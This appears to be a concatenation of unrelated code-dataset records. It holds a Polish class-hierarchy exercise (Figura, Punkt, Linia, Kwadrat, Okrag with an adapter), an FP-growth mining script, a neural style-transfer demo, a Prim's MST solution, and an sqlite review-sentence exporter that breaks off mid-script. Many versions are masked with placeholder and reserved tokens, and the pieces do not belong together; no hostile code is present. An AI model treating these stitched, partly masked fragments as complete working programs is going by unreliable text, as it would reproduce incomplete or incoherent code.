"step-4": "class Figura:\n <mask token>\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy Figura.')\n <mask token>\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Figura.')\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Punkt.')\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n 
self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-5": "class Figura:\n def __init__(self):\n print(\"Tworze obiekt klasy Figura...\")\n def pobierz_polozenie(self):\n print(\"Metoda pobierz_polozenie klasy Figura.\")\n def nadaj_polozenie(self):\n print(\"Metoda nadaj_polozenie klasy Figura.\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Figura.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Figura.\")\n def nadaj_kolor(self):\n print(\"Metoda nadaj_kolor klasy Figura.\")\n def usun(self):\n print(\"Metoda usun klasy Figura.\")\n\nclass Punkt(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Punkt...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Punkt.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Punkt.\")\n def usun(self):\n print(\"Metoda usun klasy Punkt.\")\n\nclass Linia(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Linia...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Linia.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Linia.\")\n def usun(self):\n print(\"Metoda usun klasy Linia.\")\n\nclass Kwadrat(Figura):\n def __init__(self):\n print(\"Tworze obiekt klasy Kwadrat...\")\n def wyswietl(self):\n print(\"Metoda wyswietl klasy Kwadrat.\")\n def wypelnij(self):\n print(\"Metoda wypelnij klasy Kwadrat.\")\n def usun(self):\n print(\"Metoda usun klasy Kwadrat.\")\n\nclass XXOkrag:\n def __init__(self):\n print(\"Tworze obiekt klasy XXOkrag...\")\n def wyswietlaj(self):\n print(\"Metoda wyswietlaj klasy XXOkrag.\")\n def wypelniaj(self):\n print(\"Metoda wypelniaj klasy XXOkrag.\")\n def usuwaj(self):\n print(\"Metoda usuwaj klasy XXOkrag.\")\n def pobierz_polozenie(self):\n print(\"Metoda pobierz_polozenie klasy XXOkrag.\")\n def nadaj_polozenie(self):\n print(\"Metoda nadaj_polozenie klasy XXOkrag.\")\n def ustaw_kolor(self):\n print(\"Metoda ustaw_kolor klasy XXOkrag.\")\n\nclass Okrag(Figura):\n def __init__(self):\n self.xokrag = XXOkrag()\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n def 
nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n def wypelnij(self):\n self.xokrag.wypelniaj()\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n def usun(self):\n self.xokrag.usuwaj()\n\nif __name__ == \"__main__\":\n\n lista_figur = [Linia(), Kwadrat(), Okrag()]\n\n for fig in lista_figur:\n fig.wyswietl()\n",
"step-ids": [
27,
30,
31,
34,
41
]
}
|
[
27,
30,
31,
34,
41
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
fp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)
print(len(myFreqList))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parsedDat = [line.split() for line in open('kosarak.dat').readlines()]
initSet = fp_growth.createInitSet(parsedDat)
myFPtree, myHeaderTab = fp_growth.createTree(initSet, 100000)
myFreqList = []
fp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)
print(len(myFreqList))
<|reserved_special_token_1|>
from numpy import *
import fp_growth
<|reserved_special_token_0|>
parsedDat = [line.split() for line in open('kosarak.dat').readlines()]
initSet = fp_growth.createInitSet(parsedDat)
myFPtree, myHeaderTab = fp_growth.createTree(initSet, 100000)
myFreqList = []
fp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)
print(len(myFreqList))
<|reserved_special_token_1|>
# coding=gbk
from numpy import *
import fp_growth
'''
#创建树的一个单节点
rootNode=fp_growth.treeNode('pyramid',9,None)
#为其增加一个子节点
rootNode.children['eye']=fp_growth.treeNode('eye',13,None)
rootNode.disp()
#导入事务数据库实例
simpData=fp_growth.loadSimpData()
#print("simpData:")
#print(simpData)
#对数据进行格式化处理
initSet=fp_growth.createInitSet(simpData)
#print("initSet:")
#print(initSet)
myFPtree,myHeaderTab=fp_growth.createTree(initSet,3)
#print("myFPtree:")
#print(myFPtree)
#myFPtree.disp()
print("myFPtree:")
#print(myFPtree)
myFPtree.disp()
print("myHeaderTab:")
for item in myHeaderTab.items():
print(item)
path=fp_growth.findPrefixPath('r',myHeaderTab['r'][1])
print("path:")
print(path)
#建立一个空列表来存储所有的频繁项集
freqItems=[]
fp_growth.minTree(myFPtree,myHeaderTab,3,set([]),freqItems)
'''
# Mine frequent item sets from the kosarak click-stream data set:
# each line is one transaction (a whitespace-separated list of item ids).
# Use a context manager so the file handle is closed deterministically
# (the original left the handle from open(...) unclosed).
with open('kosarak.dat') as datFile:
    parsedDat = [line.split() for line in datFile]
initSet = fp_growth.createInitSet(parsedDat)
# Build the FP-tree, keeping only items that appear in >= 100000 transactions.
myFPtree, myHeaderTab = fp_growth.createTree(initSet, 100000)
myFreqList = []
# Recursively mine the tree; frequent item sets accumulate in myFreqList.
fp_growth.minTree(myFPtree, myHeaderTab, 100000, set(), myFreqList)
print(len(myFreqList))
|
flexible
|
{
"blob_id": "e8b0e6e5e68933703e2ac8c9b2b62d68c0c2f53d",
"index": 8295,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)\nprint(len(myFreqList))\n",
"step-3": "<mask token>\nparsedDat = [line.split() for line in open('kosarak.dat').readlines()]\ninitSet = fp_growth.createInitSet(parsedDat)\nmyFPtree, myHeaderTab = fp_growth.createTree(initSet, 100000)\nmyFreqList = []\nfp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)\nprint(len(myFreqList))\n",
"step-4": "from numpy import *\nimport fp_growth\n<mask token>\nparsedDat = [line.split() for line in open('kosarak.dat').readlines()]\ninitSet = fp_growth.createInitSet(parsedDat)\nmyFPtree, myHeaderTab = fp_growth.createTree(initSet, 100000)\nmyFreqList = []\nfp_growth.minTree(myFPtree, myHeaderTab, 100000, set([]), myFreqList)\nprint(len(myFreqList))\n",
"step-5": "# coding=gbk\nfrom numpy import *\n\nimport fp_growth\n\n\n'''\n#创建树的一个单节点\nrootNode=fp_growth.treeNode('pyramid',9,None)\n#为其增加一个子节点\nrootNode.children['eye']=fp_growth.treeNode('eye',13,None)\n\nrootNode.disp()\n\n\n\n#导入事务数据库实例\nsimpData=fp_growth.loadSimpData()\n#print(\"simpData:\")\n#print(simpData)\n\n#对数据进行格式化处理\ninitSet=fp_growth.createInitSet(simpData)\n#print(\"initSet:\")\n#print(initSet)\n\nmyFPtree,myHeaderTab=fp_growth.createTree(initSet,3)\n\n#print(\"myFPtree:\")\n#print(myFPtree)\n#myFPtree.disp()\n\nprint(\"myFPtree:\")\n#print(myFPtree)\nmyFPtree.disp()\n\n\nprint(\"myHeaderTab:\")\nfor item in myHeaderTab.items():\n\tprint(item)\n\t\npath=fp_growth.findPrefixPath('r',myHeaderTab['r'][1])\nprint(\"path:\")\t\nprint(path)\n\n#建立一个空列表来存储所有的频繁项集\nfreqItems=[]\nfp_growth.minTree(myFPtree,myHeaderTab,3,set([]),freqItems)\n\n\n'''\n\nparsedDat=[line.split() for line in open('kosarak.dat').readlines()]\ninitSet=fp_growth.createInitSet(parsedDat)\nmyFPtree,myHeaderTab=fp_growth.createTree(initSet,100000)\nmyFreqList=[]\nfp_growth.minTree(myFPtree,myHeaderTab,100000,set([]),myFreqList)\nprint(len(myFreqList))\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Demo - train the decoders & use them to stylize image
from __future__ import print_function
from train import train
from infer import stylize
from utils import list_images
# Mode switch: True trains the decoders, False runs stylization with a
# previously trained model.
IS_TRAINING = True

# for training
TRAINING_IMGS_PATH = 'MS_COCO'                     # directory of training images
ENCODER_WEIGHTS_PATH = 'vgg19_normalised.npz'      # pre-trained VGG-19 encoder weights
MODEL_SAVE_PATH = 'models/autoencoder'             # checkpoint path prefix
MODEL_SAVE_SUFFIX = '-done'                        # appended to the final checkpoint name

DEBUG = True                                       # enable extra logging during training
LOGGING_PERIOD = 10                                # log every N steps when DEBUG is on
# Decoder levels to train, from deepest (5) to shallowest (1).
# NOTE(review): "AUTUENCODER" looks like a typo for "AUTOENCODER"; renaming
# would require updating every use below, so it is only flagged here.
AUTUENCODER_LEVELS_TRAIN = [5, 4, 3, 2, 1]

# for inferring (stylize)
CONTENTS_DIR = 'images/content'                    # content images to stylize
STYLES_DIR = 'images/style'                        # style reference images
OUTPUT_DIR = 'outputs'                             # where stylized results are written

STYLE_RATIO = 0.8                                  # style/content blending weight in [0, 1]
REPEAT_PIPELINE = 1                                # how many times to re-run the stylize pipeline
AUTUENCODER_LEVELS_INFER = [3, 2, 1]               # decoder levels used at inference time
def main():
    """Entry point: train the decoders or stylize images, per IS_TRAINING."""
    if IS_TRAINING:
        _run_training()
    else:
        _run_stylize()


def _run_training():
    """Train the autoencoder decoders on the configured image set."""
    image_paths = list_images(TRAINING_IMGS_PATH)
    train(image_paths,
          ENCODER_WEIGHTS_PATH,
          MODEL_SAVE_PATH,
          autoencoder_levels=AUTUENCODER_LEVELS_TRAIN,
          debug=DEBUG,
          logging_period=LOGGING_PERIOD)
    print('\n>>>>>> Successfully done training...\n')


def _run_stylize():
    """Stylize every content image with every style image using the trained model."""
    content_paths = list_images(CONTENTS_DIR)
    style_paths = list_images(STYLES_DIR)
    trained_model = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX
    stylize(content_paths,
            style_paths,
            OUTPUT_DIR,
            ENCODER_WEIGHTS_PATH,
            trained_model,
            style_ratio=STYLE_RATIO,
            repeat_pipeline=REPEAT_PIPELINE,
            autoencoder_levels=AUTUENCODER_LEVELS_INFER)
    print('\n>>>>>> Successfully done stylizing...\n')


if __name__ == '__main__':
    main()
|
normal
|
{
"blob_id": "31ed798118f20005b5a26bc1fc0053b7d0a95657",
"index": 5366,
"step-1": "<mask token>\n\n\ndef main():\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n train(training_imgs_paths, ENCODER_WEIGHTS_PATH, MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN, debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n print('\\n>>>>>> Successfully done training...\\n')\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n stylize(contents_path, styles_path, OUTPUT_DIR,\n ENCODER_WEIGHTS_PATH, model_path, style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE, autoencoder_levels=\n AUTUENCODER_LEVELS_INFER)\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n train(training_imgs_paths, ENCODER_WEIGHTS_PATH, MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN, debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n print('\\n>>>>>> Successfully done training...\\n')\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n stylize(contents_path, styles_path, OUTPUT_DIR,\n ENCODER_WEIGHTS_PATH, model_path, style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE, autoencoder_levels=\n AUTUENCODER_LEVELS_INFER)\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nIS_TRAINING = True\nTRAINING_IMGS_PATH = 'MS_COCO'\nENCODER_WEIGHTS_PATH = 'vgg19_normalised.npz'\nMODEL_SAVE_PATH = 'models/autoencoder'\nMODEL_SAVE_SUFFIX = '-done'\nDEBUG = True\nLOGGING_PERIOD = 10\nAUTUENCODER_LEVELS_TRAIN = [5, 4, 3, 2, 1]\nCONTENTS_DIR = 'images/content'\nSTYLES_DIR = 'images/style'\nOUTPUT_DIR = 'outputs'\nSTYLE_RATIO = 0.8\nREPEAT_PIPELINE = 1\nAUTUENCODER_LEVELS_INFER = [3, 2, 1]\n\n\ndef main():\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n train(training_imgs_paths, ENCODER_WEIGHTS_PATH, MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN, debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n print('\\n>>>>>> Successfully done training...\\n')\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n stylize(contents_path, styles_path, OUTPUT_DIR,\n ENCODER_WEIGHTS_PATH, model_path, style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE, autoencoder_levels=\n AUTUENCODER_LEVELS_INFER)\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from __future__ import print_function\nfrom train import train\nfrom infer import stylize\nfrom utils import list_images\nIS_TRAINING = True\nTRAINING_IMGS_PATH = 'MS_COCO'\nENCODER_WEIGHTS_PATH = 'vgg19_normalised.npz'\nMODEL_SAVE_PATH = 'models/autoencoder'\nMODEL_SAVE_SUFFIX = '-done'\nDEBUG = True\nLOGGING_PERIOD = 10\nAUTUENCODER_LEVELS_TRAIN = [5, 4, 3, 2, 1]\nCONTENTS_DIR = 'images/content'\nSTYLES_DIR = 'images/style'\nOUTPUT_DIR = 'outputs'\nSTYLE_RATIO = 0.8\nREPEAT_PIPELINE = 1\nAUTUENCODER_LEVELS_INFER = [3, 2, 1]\n\n\ndef main():\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n train(training_imgs_paths, ENCODER_WEIGHTS_PATH, MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN, debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n print('\\n>>>>>> Successfully done training...\\n')\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n stylize(contents_path, styles_path, OUTPUT_DIR,\n ENCODER_WEIGHTS_PATH, model_path, style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE, autoencoder_levels=\n AUTUENCODER_LEVELS_INFER)\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Demo - train the decoders & use them to stylize image\n\nfrom __future__ import print_function\n\nfrom train import train\nfrom infer import stylize\nfrom utils import list_images\n\n\nIS_TRAINING = True\n\n# for training\nTRAINING_IMGS_PATH = 'MS_COCO'\nENCODER_WEIGHTS_PATH = 'vgg19_normalised.npz'\nMODEL_SAVE_PATH = 'models/autoencoder'\nMODEL_SAVE_SUFFIX = '-done'\n\nDEBUG = True\nLOGGING_PERIOD = 10\nAUTUENCODER_LEVELS_TRAIN = [5, 4, 3, 2, 1]\n\n# for inferring (stylize)\nCONTENTS_DIR = 'images/content'\nSTYLES_DIR = 'images/style'\nOUTPUT_DIR = 'outputs'\n\nSTYLE_RATIO = 0.8\nREPEAT_PIPELINE = 1\nAUTUENCODER_LEVELS_INFER = [3, 2, 1]\n\n\ndef main():\n\n if IS_TRAINING:\n training_imgs_paths = list_images(TRAINING_IMGS_PATH)\n\n train(training_imgs_paths,\n ENCODER_WEIGHTS_PATH,\n MODEL_SAVE_PATH,\n autoencoder_levels=AUTUENCODER_LEVELS_TRAIN,\n debug=DEBUG,\n logging_period=LOGGING_PERIOD)\n \n print('\\n>>>>>> Successfully done training...\\n')\n\n else:\n contents_path = list_images(CONTENTS_DIR)\n styles_path = list_images(STYLES_DIR)\n model_path = MODEL_SAVE_PATH + MODEL_SAVE_SUFFIX\n\n stylize(contents_path, \n styles_path, \n OUTPUT_DIR, \n ENCODER_WEIGHTS_PATH, \n model_path, \n style_ratio=STYLE_RATIO,\n repeat_pipeline=REPEAT_PIPELINE,\n autoencoder_levels=AUTUENCODER_LEVELS_INFER)\n\n print('\\n>>>>>> Successfully done stylizing...\\n')\n\n\nif __name__ == '__main__':\n main()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# from __future__ import annotations
from typing import List,Union,Tuple,Dict,Set
import sys
# Competitive-programming speed idiom: rebind input to sys.stdin.readline for
# faster repeated reads.  Deliberately shadows the builtin; unlike input(),
# readline keeps the trailing newline (harmless for the split()/int parsing below).
input = sys.stdin.readline
# from collections import defaultdict,deque
# from itertools import permutations,combinations
# from bisect import bisect_left,bisect_right
import heapq
# sys.setrecursionlimit(10**5)
# class UnionFind():
# def __init__(self, N:int):
# self.par = [-1]*N
# self.size = [1]*N
# def root(self, x:int):
# if self.par[x] == -1: return x
# self.par[x] = self.root(self.par[x])
# self.size[x] = 1
# return self.par[x]
# def unite(self, x:int, y:int):
# rx,ry = self.root(x), self.root(y)
# if rx == ry: return False
# if self.size[rx] >= self.size[ry]:
# self.par[ry] = rx
# self.size[rx] += self.size[ry]
# else:
# self.par[rx] = ry
# self.size[ry] += self.size[rx]
# return True
# #! クラスカル法
# def main():
# N,M,K = map(int, input().split())
# edges = []
# for _ in range(M):
# a,b,c = map(int, input().split())
# a -= 1
# b -= 1
# edges.append((c,a,b))
# edges.sort()
# unionfind = UnionFind(N)
# ans = 0
# used = []
# for c,a,b in edges:
# if unionfind.unite(a,b):
# ans += c
# used.append(c)
# for i in range(1,K):
# ans -= used[-i]
# print(ans)
#! プリム法
def main():
    """Prim's MST over N cities / M roads; the K-1 costliest chosen edges are
    made free, and the remaining total cost is printed."""
    n, m, k = map(int, input().split())
    adj = [[] for _ in range(n)]
    for _ in range(m):
        u, v, cost = map(int, input().split())
        adj[u - 1].append((cost, v - 1))
        adj[v - 1].append((cost, u - 1))

    total = 0
    picked = []                 # cost of each edge added to the tree (0 for the root)
    visited = [False] * n
    heap = [(0, 0)]             # (edge cost, vertex), seeded with vertex 0
    while heap:
        cost, vertex = heapq.heappop(heap)
        if visited[vertex]:
            continue
        visited[vertex] = True
        total += cost
        picked.append(cost)
        for next_cost, neighbor in adj[vertex]:
            if not visited[neighbor]:
                heapq.heappush(heap, (next_cost, neighbor))

    # Discount the K-1 most expensive edges actually used.
    picked.sort()
    for offset in range(1, k):
        total -= picked[-offset]

    print(total)


if __name__ == '__main__':
    main()
|
normal
|
{
"blob_id": "13b2e05f12c6d0cd91e89f01e7eef610b1e99856",
"index": 9158,
"step-1": "<mask token>\n\n\ndef main():\n N, M, K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a, b, c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c, b))\n G[b].append((c, a))\n ans = 0\n used = []\n marked = [False] * N\n Q = []\n heapq.heappush(Q, (0, 0))\n while len(Q) > 0:\n fee, curr = heapq.heappop(Q)\n if marked[curr]:\n continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee, nxt in G[curr]:\n if marked[nxt]:\n continue\n heapq.heappush(Q, (nxt_fee, nxt))\n used.sort()\n for i in range(1, K):\n ans -= used[-i]\n print(ans)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n N, M, K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a, b, c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c, b))\n G[b].append((c, a))\n ans = 0\n used = []\n marked = [False] * N\n Q = []\n heapq.heappush(Q, (0, 0))\n while len(Q) > 0:\n fee, curr = heapq.heappop(Q)\n if marked[curr]:\n continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee, nxt in G[curr]:\n if marked[nxt]:\n continue\n heapq.heappush(Q, (nxt_fee, nxt))\n used.sort()\n for i in range(1, K):\n ans -= used[-i]\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\ninput = sys.stdin.readline\n<mask token>\n\n\ndef main():\n N, M, K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a, b, c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c, b))\n G[b].append((c, a))\n ans = 0\n used = []\n marked = [False] * N\n Q = []\n heapq.heappush(Q, (0, 0))\n while len(Q) > 0:\n fee, curr = heapq.heappop(Q)\n if marked[curr]:\n continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee, nxt in G[curr]:\n if marked[nxt]:\n continue\n heapq.heappush(Q, (nxt_fee, nxt))\n used.sort()\n for i in range(1, K):\n ans -= used[-i]\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from typing import List, Union, Tuple, Dict, Set\nimport sys\ninput = sys.stdin.readline\nimport heapq\n\n\ndef main():\n N, M, K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a, b, c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c, b))\n G[b].append((c, a))\n ans = 0\n used = []\n marked = [False] * N\n Q = []\n heapq.heappush(Q, (0, 0))\n while len(Q) > 0:\n fee, curr = heapq.heappop(Q)\n if marked[curr]:\n continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee, nxt in G[curr]:\n if marked[nxt]:\n continue\n heapq.heappush(Q, (nxt_fee, nxt))\n used.sort()\n for i in range(1, K):\n ans -= used[-i]\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# from __future__ import annotations\nfrom typing import List,Union,Tuple,Dict,Set\nimport sys\ninput = sys.stdin.readline\n# from collections import defaultdict,deque\n# from itertools import permutations,combinations\n# from bisect import bisect_left,bisect_right\nimport heapq\n# sys.setrecursionlimit(10**5)\n\n# class UnionFind():\n\n# def __init__(self, N:int):\n# self.par = [-1]*N\n# self.size = [1]*N\n\n# def root(self, x:int):\n# if self.par[x] == -1: return x\n# self.par[x] = self.root(self.par[x])\n# self.size[x] = 1\n# return self.par[x]\n\n# def unite(self, x:int, y:int):\n# rx,ry = self.root(x), self.root(y)\n# if rx == ry: return False\n# if self.size[rx] >= self.size[ry]:\n# self.par[ry] = rx\n# self.size[rx] += self.size[ry]\n# else:\n# self.par[rx] = ry\n# self.size[ry] += self.size[rx]\n# return True\n\n# #! クラスカル法\n# def main():\n# N,M,K = map(int, input().split())\n# edges = []\n# for _ in range(M):\n# a,b,c = map(int, input().split())\n# a -= 1\n# b -= 1\n# edges.append((c,a,b))\n# edges.sort()\n# unionfind = UnionFind(N)\n# ans = 0\n# used = []\n# for c,a,b in edges:\n# if unionfind.unite(a,b):\n# ans += c\n# used.append(c)\n\n# for i in range(1,K):\n# ans -= used[-i]\n\n# print(ans)\n\n#! プリム法\ndef main():\n N,M,K = map(int, input().split())\n G = [[] for _ in range(N)]\n for _ in range(M):\n a,b,c = map(int, input().split())\n a -= 1\n b -= 1\n G[a].append((c,b))\n G[b].append((c,a))\n\n ans = 0\n used = []\n\n marked = [False]*N\n Q = [] #* (通行料金,都市)\n heapq.heappush(Q,(0,0))\n while len(Q)>0:\n fee,curr = heapq.heappop(Q)\n if marked[curr]: continue\n marked[curr] = True\n ans += fee\n used.append(fee)\n for nxt_fee,nxt in G[curr]:\n if marked[nxt]: continue\n heapq.heappush(Q, (nxt_fee,nxt))\n\n used.sort()\n for i in range(1,K):\n ans -= used[-i]\n\n print(ans)\n\nif __name__ == '__main__':\n main()",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
<|reserved_special_token_0|>
def main(args):
f = open(args.output, 'w', encoding='utf-8')
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append('{} {}\n'.format(label, ' '.join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print('wrote {} sentences'.format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print('wrote {} sentences'.format(i))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
def iterReviews(db):
con = sqlite3.connect(db)
c = con.cursor()
i = 0
for pid, uname, rev, rating in c.execute(
'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'
):
if pid is None or uname is None or rating is None or rev is None:
continue
else:
for sent in rev.split('.'):
if len(sent) < 2:
continue
else:
yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.
format(pid), 'r_{}'.format(rating)]
i += 1
def main(args):
f = open(args.output, 'w', encoding='utf-8')
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append('{} {}\n'.format(label, ' '.join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print('wrote {} sentences'.format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print('wrote {} sentences'.format(i))
<|reserved_special_token_0|>
parser.add_argument('db', type=str)
parser.add_argument('output', type=str, default='sentences.txt')
parser.add_argument('--min_count', type=int, default=100)
parser.add_argument('--min_sent_size', type=int, default=5)
parser.add_argument('--buff_size', type=int, default=1000000)
<|reserved_special_token_0|>
main(args)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
def iterReviews(db):
con = sqlite3.connect(db)
c = con.cursor()
i = 0
for pid, uname, rev, rating in c.execute(
'SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'
):
if pid is None or uname is None or rating is None or rev is None:
continue
else:
for sent in rev.split('.'):
if len(sent) < 2:
continue
else:
yield sent.split(' '), ['u_{}'.format(uname), 'i_{}'.
format(pid), 'r_{}'.format(rating)]
i += 1
def main(args):
f = open(args.output, 'w', encoding='utf-8')
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append('{} {}\n'.format(label, ' '.join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print('wrote {} sentences'.format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print('wrote {} sentences'.format(i))
parser = argparse.ArgumentParser()
parser.add_argument('db', type=str)
parser.add_argument('output', type=str, default='sentences.txt')
parser.add_argument('--min_count', type=int, default=100)
